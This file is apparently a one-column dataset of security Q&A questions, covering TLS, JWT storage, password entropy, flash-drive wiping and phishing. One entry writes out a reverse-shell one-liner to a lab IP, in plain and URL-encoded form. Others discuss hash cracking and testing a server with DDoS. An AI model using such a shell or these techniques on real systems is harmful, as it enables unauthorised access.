instruction
stringlengths
24
29.9k
If one uses a micro SD card with a card reader on Windows, or on Linux, or on Android, would there be a way to forensically determine on which computer the card reader was used? I know OS can log which USB devices was connected. As far as I know the log is saved locally to OS, not to the USB devices. Is there any way O...
Recently starting to immerse myself into cryptography, the problem concerning the generation of true randomness being unachievable for computers at this point was raised. If computers were able to measure temperature, or measure time in nanoseconds, some randomness could be acquired. This is however not the case. A som...
I've received PDF at work, which I then ran through virustotal scan out of habit. It turned out to be clean, but at the same time some tags caught my attention, namely: checks-user-input detect-debug-environment direct-cpu-clock-access long-sleeps runtime-modules These remain even after running it through ghostscript...
Every now and then, you here a story about misuses of mobile OS' spyware softwares, developed by technology firms which usually sell their products to governments or groups with similar power. You here stories about Whatsapp calls, sms, images, urls. Basically, the number is all you need to carry out the attack. What I...
Is it secure to send messages between a WebSocket Server and the Client? An example of sending messages between a (Socket.io) server, is in Node.js: socket.on("myMessage", function(msg) { // "msg" is the message being sent }); Could a user get / change the client-side JavaScript code, and send some kind of bad message...
We are serving static content over the internet, and have a business requirement that the data must be encrypted at rest. Currently it is stored in AWS S3, where it can be accessed by authorized clients over HTTP. We could proxy this through Cloudfront or Nginx to use TLS, but would only do so if it is necessary. The d...
Does rust's cargo package manager cryptographically validate its payload's authentication and integrity for all packages after downloading them and before installing them? I see a lot of guides providing installation instructions with steps asking the user to install rust dependencies with cargo install .... I usually ...
Can I please get some help in understanding the representation/connection between the issuer key structure, such as the one here: { "kty": "EC", "d": "6RDoFJrbnJ9WG0Y1CVXN0EnxbuQIgRMQfzFVKogbO6c", "use": "sig", "crv": "P-256", "x": "eIA4ZrdR7IOzYRqLER9_JIkfQCAeo1QI3VCEB7KaIow", "y": "WKPa365UL5K...
E.g. if I were to register for a new website and am prompted for a password, my browser might generate a complicated password that looks like uv^2<YGYy}#Vj}=f which might be impossible to crack but also impossible to remember. Why such passwords instead of, say, AllThatIsGoldDoesNotGlitterNotAllWhoWanderAreLost which u...
The local admin was recently blocked from running mmc.exe. UAC message says 'An administrator has blocked you from running this app.' I'm looking for details on how to investigate this. I'm not sure what event logs to check. Advanced Auditing is configured so the logs could be there.
My plan is to start building the open-source packages from their sources and use organization's security resources like SAST tools to detect security issues in them. The good thing that I see coming out of this effort is better security, especially with some of the lesser known, smaller open-source projects that are no...
As the topic is a bit vague I have decided to ask you guys here what do you think and what is the best practice in given scenario.   Disclaimer: I am programmer, and although I know a bit about security I don't posses an in-depth knowledge of attack, security and exploit methods and opportunities in given scenario.   ...
In the current day and age we have the problem of malicious/spam crawlers and similar concerns. My suggestion would be implementing cookie support for crawling and by that I mean giving specific cookies with crawler ID (at best refreshed using refresh tokens), which get you identify the crawler and the crawler using th...
The classic malloc overflow, of overwriting pointers in a free chunk, to cause free() unlink to overwrite an arbitrary location with an arbitrary value, is no longer possible with modern glibc (although, other, more complicated attacks are possible), due to various security checks. What are these checks, how do they wo...
When dealing with cryptographic secrets (private keys, passwords, etc) it is desirable to not run these secrets through functions that do not run in constant time, in order to avoid the potential for side channel attacks. An example of this would be the encoding a Unicode string into bytes to be used as an input for a ...
I have seen several tutorials about setting up Virtualbox networks for Kali & vulnerable machines together using the option Internal network, but I have several questions regarding other configurations and the risks for my home network: I would like to have internet connection inside Kali. Usually I would use NAT, but...
I have been researching http host header attacks. There are many examples such as <a href="https://_SERVER['HOST']/support">Contact support</a>. Why would anyone use an absolute path for resources served by the same server? I've only seen absolute paths to link to different servers. For example I would expect <a href="...
I received an email from an old colleague asking me to take a look at an attachment. The email didn’t seem suspicious at all, it contained all the right logos, etc. When I opened the attachment it asked me to click on a button, which I did, then it asked me for my login credentials. This was on my iPhone. I stupidly we...
Would a file upload function be vulnerable to code execution where the uploaded file is always converted to a PNG file by the application? For example, if one uploads shell.php and this file is converted into somerandomstring.png, can one assume that it is not vulnerable as the server will always render this as an imag...
Among the many "threats", I see on my SIEM, a non-standard port is a top one. It's always been a false positive, but I don't understand why this happens frequently?
I want to hash passwords for security, but strong bcrypt by nature eat up a bit of resources of the server. So I was thinking to do the encryption on the client side. This would prevent the password from being known in the case the off chance server is hacked. Client JS encrypts password via bcrypt -> sends to server v...
When you update a new installation for the first time, or update a long time unmaintained OS, do you just enable a software firewall for all incoming connections (and hope there are no obsolete critical bugs hanging there) or do you take any other special security precautions like updating in a separate network to prev...
I just got weird warning on a social network about a scam that is supposedly making the rounds. However the claims were quite outlandish and I'm skeptical if it's even technically possible. If the post is to be believed, apparently there are some scammers calling people and pretending to be cell phone network technicia...
Suppose I am using a web browser to look at example.com. Now, from the same web browser tab, I enter example.org in the address bar and go to that completely different website operated by another entity. Does example.org know that the previous website I used was example.com? I understand that example.org can look at th...
Are there any security risks to returning a user's JWT in the response body to a GET request? The JWT is only returned for authenticated users. Authentication is managed via a JWT stored as a HttpOnly, Secure, SameSite:Lax cookie. Flow, in detail: User makes GET request to my.com/api/session. The request includes the ...
I am trying to understand the risks posed by having a wireguard connection under a very specific and narrow set of circumstances. I have a desktop at home that is behind a router/firewall and is not exposed to the internet in any way. I am planning to have a wireguard tunnel from this desktop to a server in the cloud...
I have a number of smart home devices in my house. Some of which are a Samsung refrigerator, a Whirlpool washer, a Bose Bluetooth speaker with wifi and a Roku TV all of which I assume have microphones. What would be the best way at securing these devices from being hacked and listened in on short of completely dismantl...
The data on my USB thumb drive is no longer accessible using a usual consumer computer (cf. https://superuser.com/questions/1687720). I wish to make sure that someone cannot extract data from it without having to take extraordinary measures (e.g. spending €million). How to damage the drive's data beyond (easy) recover...
As the image below shows, when you try to restore an existing wallet from a seed (a sequence of 12 words), the program offers some autocomplete suggestions. Though I'm sure the risk is purely theoretical – in the sense that the number of permutations is high enough to make any attempt at guessing practically impossible...
A new critical issue was discovered in the character definitions of the Unicode Specification through 14.0. Does it only affect code compiled from sources with disallowed unicode characters? RHEL describes that it is relevant only to GCC. Is it only C or CPP files? What if a disallowed unicode character appears in HTML...
The Microsoft .NET Bounty Program states that "Vulnerabilities in the .NET Framework, or any ASP.NET framework running on .NET Framework (Webforms or MVC)" is out of scope. Is .NET Framework covered by another bounty program? Or is just considered to be "low-severity or out of scope"? If this is true, what does it mean...
I've run a malware ruleset from the Yara rules repository run on my Sys32 directory yara64.exe -f -r ./malware_index.yar C:\Windows\System32 and come across a lot of positives (+extra counts) for GLASSES and GLASSESCode Most matches are with DirectX DLLs but I assume it's just coincidental matches. I would appreciate ...
this is my first post here in the area of ​​security and encryption. I will try to be succinct, and let you know that I am not an expert in security. Context: My client (visitor) has an X509 certificate installed on his machine, containing its public and private key. This certificate attests to who he is as a person. P...
It seems like exploiting XSS is becoming harder with every browser version update. My question is: Is this code vulnerable to XSS? <script type="text/javascript"> var url = location.href; document.write("URL: " + url); </script>
One way to build a password is to take the first letter from each word in a sentence. For example, the password "Itsfrqbtwaawwnsl" comes from the sentence "I tried searching for related questions but they were all about whole words not single letters". In such a password, how much entropy does each letter add? Is it th...
I have been starting to read "The Application Hackers Handbook 2nd Edition" and just recently finished reading "Chapter 7: Attacking Session Management". Do companies develop their own session management library or do they use well-known developed libraries (ex: Passport.js and etc.)? The book mentioned a lot regarding...
I am working on an unusual setup and wonder if OpenSSL can deal with it: Small amounts of data, about 64 bytes per request / response, which I'd like to squeeze into a single protocol data unit (datagram segment, I think). The program will send the exact same requests / responses repeatedly. There will be PSK not PKI ...
The certificate list I am referring to can be found using the openssl command, and is displayed under the "Acceptable client certificate CA names" heading. I am wondering if by exposing this certificate list can be used by an attacker to become authenticated, or any other security concern. Based on RFC 5246, 7.4.4.  Ce...
I have a REST which takes a parameter dataSource as input and myService has follow logic. @RequestMapping(value ="/save", method = RequestMethod.POST) public List<String> find(@RequestBody String dataSource){ return myService.doPost(dataSource); } We search the URL in the database by dataSource as key. Then we get...
When we run app.package.attacksurface in drozer, it shows exported activities, content providers etc. I understand it means that they could be vulnerable, but why do they call it "exported"?
I am developing a modification for a game server. The mod hosts a SocketServer which clients can connect to using a smartphone app, allowing them to chat with other players whilst not physically playing on the server. In order for a client to connect through the smartphone app, they must present an access token in the ...
Which heat ensures permanent loss of data on flash memory, in particular, on consumer-grade USB thumb drives (e.g., http://www.amazon.de/dp/B085SXT9FS or http://www.hood.de/0094819941.htm )? How long should be the exposure to that temperature to erase, say, 50% of the data? Clearly, everything is gone at the melting po...
Im looking to test a set of YARA rules against a corpus of 'goodware'. Virustotal's own blog [2] suggests use of the National Software Reference Library [1] however the NRSL RDS(Data Sets) have instances of Malware and Stenography Hashes which aren't useful for my purposes. My interest is to test my rules against said ...
As I understand things, given a user with proper password management (e.g. with a libre password manager like KeePassXC) the only realistic threat is having passwords leaked the following ways: A: password keylogged (e.g. logging in to your account on any compromised device) or phished B: manager database leaked (e.g...
Can a hacker locally bypass UEFI password without changing or resetting it ?
I am coding an online password manager as part of my apprenticeship. I have already coded the full backend to synchronize the encrypted data and a frontend that encrypts and decrypts data with AES. So far, no secrets are shared with the backend. How do I avoid storing other data and especially unencrypted data in the d...
This article in the Avira (part of NortonLifeLock) security blog discusses (vaguely) security risks of public Wi-Fi. The article states: Man in the middle attacks are also a very prominent threat, this is when a hacker sets up a network to lure users in by making it look like a free, open network. They will often do ...
If a non-compromised device is connected to the internet via open Wi-Fi, anyone can view the traffic. But if all the connections to the servers use a reasonably secure cryptographic protocol (such as a recent version of TLS), is the communication secure? If so, what is the harm of using open Wi-Fi if one only allows TL...
I have been searching resources online about proper MFA/2FA (with O365 specifically) considerations. How is the MFA push challenge notification to Approve or Deny a sign-on not dangerous? I have yet to find any articles stating this. Most I see is how TXT based is no good. Example with the Approve/Deny type of MFA: I...
OpenBSD has had much fewer "code execution" vulnerabilities and even fewer exploits than FreeBSD, according to https://cvedetails.com : https://www.cvedetails.com/product/163/Openbsd-Openbsd.html?vendor_id=97 https://www.cvedetails.com/product/7/Freebsd-Freebsd.html?vendor_id=6 However, I wonder if this is an apples-...
This article by Avira (part of NortonLifeLock) claims that 2FA (2-Factor Authentication) may be sufficient to protect against formjacking: Enable 2-Factor Authentication: Create strong and complex passwords to protect all your accounts. If possible, configure 2-factor authentication, as this may be enough to protect y...
I'd like to rewrite a monolithic social website to use JWT for authentication instead of traditional cookie/sessionm, and I'm looking for a secure implementation. I read here that: You might think an HttpOnly cookie (created by the server instead of the client) will help, but cookies are vulnerable to CSRF attacks. It...
Given the fact that modern radios/walkie talkies/ham sets have CPUs on them...would it be possible to exploit them? I am thinking in the following scenario: -There is a vulnerability in the function that processes the analog radio signals and thus an attacker can exploit it and achieve RCE (Maybe an stack buffer overfl...
About secure boot, I've visited intel's website and they said: The feature defines an entirely new interface between operating system and firmware/BIOS. When enabled and fully configured, Secure Boot helps a computer resist attacks and infection from malware. So, if my firmware and/or BIOS is infected, does this mean...
In a similar manner to a usb rubber ducky, can one use an SD card to emulate an HID device (such as a mouse or keyboard)? If so, how could this be implemented, and how can it be protected against?
A big web service asked me to upload a .HAR file from Chrome incognito to help them with my support request. What sensitive information could I expose and how can I remove it? I don't mind IP address and username, but stuff like: Google authentication token Google password (!!!) Cookies or stored data from other websi...
If a bit gets flipped by the network in a TLS stream, then the message integrity check in TLS will fail. Does TLS retransmit the affected message? Or does it do something else, like terminate the entire TLS stream?
I sleepily clicked on this bad link yesterday (DONT CLICK Unless you know what you're doing: https://6to.me/idsoni7kjv with a "?fbclid=" param - presumably identifying me) I'm wondering how much harm could be done. I'm sure it could try to phish me with mimic websites, but it didn't seem to do that. I'm more worried ...
Specifically do they, but not "Can they" only because I'm fully aware that they are, and always have been, capable of intruding on any/all personal/sensitive data that isn't encrypted on a local drive or removable hard drive. I'm fairly new to the encrypted data area, as well as storing data in the cloud. I'm just try...
I have an old laptop which is running Ubuntu 20.04 and I am planning to use a virtual machine of Windows 7 Pro (using VirtualBox maybe). As its an old laptop and not my primary source of using the internet, I plan to keep airplane mode on (if this even helps security-wise). I saw on another thread about using a storage...
I have locked myself out of my Win 10 Microsoft account by forgetting my password and need to get back into it. I have extracted the hash for the account. I've been researching wordlists and hash cracking and think I've got a hang of the actual cracking process. I have been using hashcat. I am struggling to create a cu...
In the good old days, you made server-side websites using PHP or something like that, now we have modern web apps divided into front-end and back-end (usually API Rest), you can't rely on CORS because some clients like postman don't care about it. How can you protect confidential info? picture this: You have an API let...
Imagine a simple API, which offers an endpoint POST /account/authenticate, which takes a username and password, then returns a JWT on success and an error on failure. In the backend, the endpoint uses some key-derivation function like Argon2 or PBKDF2, with the parameters tuned to be difficult to crack. Wouldn't such a...
I'm debating dragging all my files onto an external hard drive manually - rather than a time machine backup - and then pulling over any specific files I need if I ever need them. Afterwards, I'll factory reset my computer, as I'm concerned it currently has malware from clicking on a bad link, though it's behaving norma...
I know MD5 is no longer secure, but is there an algorithm running in polynomial time to find preimages of a given hash, or is it just bruteforce?
I know that HTTP requests made by the site get the browser's localStorage for a site, and document.cookie is encrypted for HTTPs websites, but I'm still wondering the risk of storing sensitive information, because even if the hacker got the information, what could they do with it? They don't know the user. And if the l...
Today I received a cpanel phishing link and I clicked on it. It redirected to another cpanel. I decide to look at the url, and here it is redirect url https://example.net/esg9/cpanel.php?token=foofoofoofoofoofoo After I click, it'll redirect again https://example.example.at:2083/cpsess1234567890/?token=foofoofoofoofoo...
Is there any legitimate concerns of using WeChat in phone or computer? Is it possible they expose message data to others or for their own use? Also, will the installation of the official WeChat app jeopardize or corrupt the security and privacy of the Operating system and other files/apps residing in the phone/computer...
Many services still restrict the special characters allowed in passwords and similar with the argument that it prevents injection attacks. Now, there are many good arguments against this such as avoiding unnecessary obstructions, character choice increasing the security of chosen passwords, and so on. Here, I am only i...
According to this paper on defeating stackguard, it seems canaries are placed lower in the stack (higher address) than EBP, allowing the attacker to overwrite EBP without being noticed. But when I look at more recent code it seems the canary is placed just after (lower address) EBP, therefore protecting it. Am I misund...
I need to open a website where access is denied in my country. I would like to know if virtualbox can be used to solve this issue. my concern is if they can detect that I am using a virtual machine. if yes, is there any way to hide my location and not being detected of using the VM?
I have a smartphone that got bricked last year without warning, and it was deemed unrepairable by multiple repair centers. I did have personal stuff on it. If I recycle this phone, can someone down the line read stuff off of the device storage / ROM? Is there any technique like harvesting the Flash storage off the MB o...
Sudo and Opendoas on Linux use timestamp files to keep track of how long it's been since you've last entered your password. Doas on BSD uses a kernel feature instead. Why is the latter considered more secure?
Is there a way to know a VeraCrypt volume/header is intact? is there a way to know what hash algorithm was used? I have a VeraCrypt volume that I can't log into. I think the password should have worked so I am wondering if it's intact? Is there any way to know? And is there a way to know what hash algorithm was used?
There are some websites and apps promising (I have not tested their claims, just accidentially saw such a service on some website about phones and apps for them) to show phone location on a map given its IMEI. How do such websites and apps work? Do their operators have access to some govt services, operators' services,...
I am thinking of creating a small chatting server. I want it to be as secure as possible so I found it to be very helpful if some expert could guide me a little bit. Has there been any research on or perhaps a completely built prototype of a chatting server that doesn't know who chats with whom? That means, even if som...
Do you recommend using Google Recaptcha V3 or using Custom Captcha(like enter a number)? Some people say that Google Recaptcha V3 causes problems for the site, such as error (Creating insecurity on the site), is it true?
While using a password+ manager is a know must for sensible security, one nuisance (from an UX point of view) I encounter is that there are different password "tiers". Pretty obviously my e.g. file encryption and online banking access must be as secure as (reasonably) possible and it's okay having to enter a complex pa...
I am a beginner in anything related to GPG and I have now read quite some stuff about it to get a better idea. I think i grasped most of the concepts by now. I've worked out a GPG key strategy and i would like to hear your opinions and criticism. This should not be about the commands how to achieve the mentioned strate...
I want to do a project on onion routing for my school graduation test. I want to show how onion routing could be compromised if the end and start relay within the network are both accessible by a third party. Of course, this implies that someone has access to both relays, but I only need to show this principle for demo...
I am having a real issue cracking one NT hash i've pulled from my system for a Microsoft Account. I used - PwDump8.2 I have an admin account unlocked on the system and can access most files. I know pieces of the password so I have used John The Ripper -Jumbo john --wordlist=F:\Mutatewordlist.txt --format=NT hash.txt --...
This is the reverse shell I'm using: sh -i >& /dev/tcp/10.10.14.106/3000 0>&1 and URL encoded is sh+-i+>%26+/dev/tcp/10.10.XX.XX/3000+0>%261+ It used to work just fine and I'd catch the reverse shell with netcat. The port and IP are correct. Simple commands like id and whoami both work so I know I can execute commands...
Good evening, I'm far from a computer expert, just a user. I have an old (10 years) laptop provided by my employer to work remotely, but my personal laptop is only a couple years old and has upgraded RAM. I'm wondering if it's a bad idea to install the required VPN and use remote desktop to access my work drives from m...
My grandfather is interested in buying a smart tablet. He never had any personal computer or any internet connection. He wants to use his tablet solely to read the newspaper, as they no longer deliver in his area. He intends to download the latest issue of the newspaper by walking close to our house, temporarily connec...
I am using an Indian ISP, one that is notorious for DNS hijacking and script injection (BSNL). I have my router set to use Cloudflare's Family DNS. But despite this, every time I attempt to access a website that I have not accessed recently, my ISP intercepts the first request and I get diverted to an ad from the ISP...
I have been searching on the internet for a few days for the answer to a question, which seemingly noone is asking: Why can attackers not use csrf to steal data? I understand that the victim's browser is executing the attack. But many examples i have found, propose luring the victim onto a malicious website which then ...
I'm currently working on a project, which has a Web API, which is to be consumed by a native application. For the sake of brevity, assume that the application cannot be re-written to be a Web Application. Right now, user registration and authentication works via a simple API request, returning a JWT upon submitting the...
What are the security implications of using HTTP only for IPC for services within the same host? In my case, I am using docker-compose to host two ASP.NET Core services within the same host in Azure. One proxy service and one web API service. The only public communication is through the proxy and the API is not exposed...
I have a dual boot PC, where the Win10 (uncompressed) partition is encrypted with BitLocker. I was curious about making this test (and also encryption took quite a short time in my opinion), so while running Linux I did this: # cat /dev/nvme0n1p3 | strings -25 Remove disks or other media. xxxxxxxxxxxxxxxxxxxxxxx...
Does OpenSSL support EAP-TLS privacy? It's an optional feature part of rfc5216, section 2.1.4.
I usually connect to my work VPN on my personal Mac and then use Windows Remote Desktop client to access my work computer. Today on my Mac while disconnected from the VPN I noticed the username/machine that usually shows up in the terminal as this: myusername@macbook-pro ~ was showing as worksystemadmin@workcomputer ~ ...
How do applications(UnlockGo) that allow one to connect their Android to PC work in removing password? I thought the password also is used to encrypt Android device. Is the data erased? i.e. Encrypting and using password still useful even if the pin can be bypassed?
I was connected to a hotel wifi and airport wifi last week. Some of the files in my Downloads folder now has been compromised (soft keys stolen). Can someone connected to same wifi gain access to my Mac? at hotel or airports or home? I never install unknown softwares/apps or grant access to any apps on my mac. Is ...
I am writing an installer process (.exe). My installer deploys different components. It will add registry entries, copy files, copy files over the network, remote execute, remote PowerShell, local Powershell, etc. Sometimes, antivirus DLLs are injected into my process and harm my installer function flow causing it to f...
I had a situation where I clicked an email link send to me by a financial institution. The link first sent me to their login page where my chrome password extension automatically filled in my username and password. Usually I would never enter any passwords in a site that I arrived at via email link but the password man...
I sold an laptop recently, but didn’t care to do a secure erase to make sure there wasn’t any data left. After a long time, I suddenly realized that I shouldn’t have be so careless and began to worry about my data since it could be easily recovered. My data is quite sensitive which includes: photo of my passport pages,...
I am new to cybersecurity industry. I want to try if the company server is vulnerable to DDoS attack. Is it possible to conduct DDoS attack without damaging the live server? What I mean is, my main target is just to take down the service, but I mean no harm to the server.
I currently use fiddler/Charles Proxy/MITM proxy to decrypt and analyze SSL/TLS traffic from suspect mobile apps I want to analyze. The process I follow is to export a CA cert from Fiddler, then import that cert onto the physical phone. I then configure the phone to use the Fiddler capture machine as a proxy. I want to...
Let's imagine that we have a particularly bad hashing algorithm that, given any input, will output 1 of only 100 possible hashes. Now lets imagine that 2 of these possible hashes, when hashed again, produce the same output, all other inputs are evenly distributed and no there are no loops* (e.g. a->b->a is not possible...
If a site uses HTTP and not HTTPS, is it useful to include a Content Security Policy? Can an adversary not just remove it?